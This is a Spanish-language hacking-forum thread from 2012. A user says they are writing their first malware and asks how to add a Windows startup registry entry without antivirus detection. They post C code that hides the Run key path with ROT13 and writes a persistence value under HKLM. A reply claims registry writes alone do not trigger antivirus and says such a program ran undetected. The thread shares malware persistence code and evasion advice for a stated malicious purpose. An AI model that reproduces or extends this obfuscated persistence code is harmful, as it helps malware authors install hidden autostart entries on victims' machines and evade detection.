[SOLUCIONADO] Duda entrada en el registro

Iniciado por dlqlplb, Junio 28, 2012, 09:25:48 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario
Junio 28, 2012, 09:25:48 PM Ultima modificación: Agosto 19, 2014, 09:40:16 PM por Expermicid
Estoy empezando a programar mi primer malware, y me he topado con un detalle al momento de escribir en el registro de windows, estoy usando una funcion muy vieja  que encontre y es por eso que el antivirus me lo detecta muy rapido.
quisiera saber que metodos o formas de escribir en el registro puedo usar para no ser detectado ta rapido?
tengo entendido que se puede usar el cifrado XOR!
Tienen algun ejemplo?

       
Código: c

       HKEY startup;
    	char key[256];   	
    	k(key,"Fbsgjner\\Zvpebfbsg\\Jvaqbjf\\PheeragIrefvba\\Eha");
    	RegCreateKeyEx(HKEY_LOCAL_MACHINE , key, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &startup, NULL);
    	RegSetValueEx(startup, regname, 0, REG_SZ, (BYTE *)installpath, strlen(installpath));    	
    	RegCloseKey(startup);
     

lib.h
     
Código: c

#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <string.h>

 
char k1(char c);
void k(char *buf, const char *in);
 
char *xstrchr(const char *str, char ch);
 
 
char k1(char c)
{
char u[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
char l[] = "abcdefghijklmnopqrstuvwxyz";
char *p;
 
if ((p = xstrchr(u, c)) != NULL)
return u[((p-u) + 13) % 26];
else if ((p = xstrchr(l, c)) != NULL)
return l[((p-l) + 13) % 26];
else
return c;
}
 
void k(char *buf, const char *in)
{
while (*in)
*buf++ = k1(*in++);
*buf = 0;
}
 
char *xstrchr(const char *str, char ch)
{
while (*str && *str != ch) str++;
return (*str == ch) ? (char *)str : NULL;
}


     


c++
Enero 17, 2014, 05:58:23 PM #1 Ultima modificación: Enero 17, 2014, 07:16:00 PM por #define
Buenas dlqlplb! Bueno 100% seguro no estoy, pero sí un 99%... Todos los códigos de malware que he visto y que añaden una entrada al registro para que el programa incicie cada vez que arranque Winvirus, lo hacen igual. Lo que quiero decir con eso es que no es la escritura en el registro lo que hace saltar al antivirus, sino el código o funcionamiento del programa. Es más, hay muchísimos programas que escriben entradas en el registro (cada vez que instalas un programa, por ejemplo), que no tienen por qué ser dañinos. Por tanto hecho de escribir en el registro no indica nada. Para dar fuerza a lo que digo, te cuento que yo ejecuté uno de estos programas en mi propio ordenador con el antivirus con protección en tiempo real y aquello iba como Pedro por su casa hahahaha, ni alerta ni nada. Y efectivamente luego abrí el registro y la entrada estaba allí, tan inocente jeje.

Saludos! Digo lo de siempre, si me equivoco, por favor, que alguien me corrija.

Edito porque no tengo ni idea de qué tecla pulsé y se envió el mensaje a medias. :'(

Quiero hacer la observación de que me he leído las normas, tarde, pero cuando las he visto, por eso he borrado alguno de los mensajes que había escrito. Pone que no se responda si han pasado 120 días desde la última respuesta, pero en este caso no hubo respuesta. Por ello lo dejo, si algún moderador o administrador desea quitarlo estáis en vuestro derecho.
¿Os habéis parado un segundo a pensar qué podría haber pasado si Dennis Ritchie y Ken Thompson no hubieran hecho lo que hicieron o no hubieran existido?
Imprimir
Ir Arriba Páginas1
Acciones del Usuario